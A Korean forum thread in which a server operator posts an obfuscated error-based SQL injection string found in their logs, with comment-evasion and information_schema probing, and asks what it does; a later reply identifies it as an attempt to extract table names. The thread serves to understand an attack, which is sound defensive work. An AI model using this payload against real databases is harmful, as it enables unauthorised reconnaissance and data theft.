HOME > 게시판 > 데이터베이스
게시판| 데이터베이스
※ 게시판 용도에 맞지 않는 글(광고및 홍보 글 등)은 임의삭제될 수 있습니다.

 
작성일 : 16-06-22 20:44
서버에 이러한 요청 구문이 들어왔는데 해석좀 부탁드립니다..
 글쓴이 : 태조
조회 : 799  
아래의 요청 문자열을 보면 에러페이지 출력으로 인한 정보를 얻으려고 시도한 듯 한데
해석이 잘 안되네요 ㅠ

(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema./**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema./**/tAbLeS+/**/gRoUp/**/bY+x)a)

주석으로 인한 우회를 시도한것으로 보이고 풀어서 보면 아래같은 요청 내용으로 추려지는데
무엇을 시도한건지 자세한 설명이 듣고싶습니다 ㅠㅠ

select 1 from (
select count(*), concat (
(
select
select unhex(
hex(
concat(!~!, ABC145ZQ62DWQAFPOIYCFD, !~!)
)
)
)
from information_schema.tables limit 0,1
)
floor (rand(0)*2)
)
x from infomation_schema.tables groupby x
)
a
)


이 글을 트위터로 보내기 이 글을 페이스북으로 보내기

냠냠이 19-02-09 12:40
 
오래된 글이지만 답변 달아 드립니다.

테이블 명 추출 하려고 하는 SQL Injection 으로 파악되네요.


## google 검색
from information_schema.tables limit 0,1



https://crattack.tistory.com/entry/WEB-Blind-SQL-Injection-%EA%B3%B5%EA%B2%A9-%EB%B0%A9%EB%B2%95